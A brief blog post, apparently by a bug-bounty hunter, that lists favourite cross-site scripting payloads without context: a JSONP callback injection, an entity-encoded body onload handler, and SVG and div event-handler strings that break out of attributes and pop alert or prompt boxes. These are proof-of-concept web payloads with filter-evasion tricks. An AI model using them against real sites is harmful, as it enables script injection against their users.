Josh Jacob

XSS Payloads without context.

I love finding neat XSS payloads. Sometimes I can't write about them, and sometimes I'm just too lazy to. Here are my favorites (without context of course). Is it stored? Is it reflected? Did I get a bounty? The suspense is killing me too!

test&callback=alert%280%29%2F%2F&foo=??#@gmail.com

><body onload='%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339
%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2332%3B%26%2377%3B%26%2369%3B%26%2339%3B%26%2341%3B'>

http://[REDACTED]-sitemap-[REDACTED].s3.amazonaws.com/hackeronejosh.html

"><svg/on/onload=prompt`${"XSS"}`>

"><div onwheel=self['prompt']`XSS` style="width: 100vw;height: 100vw; z-index: 4;position: fixed;top: 0;left:0;"></div>


I'm not a designer so there is no back button.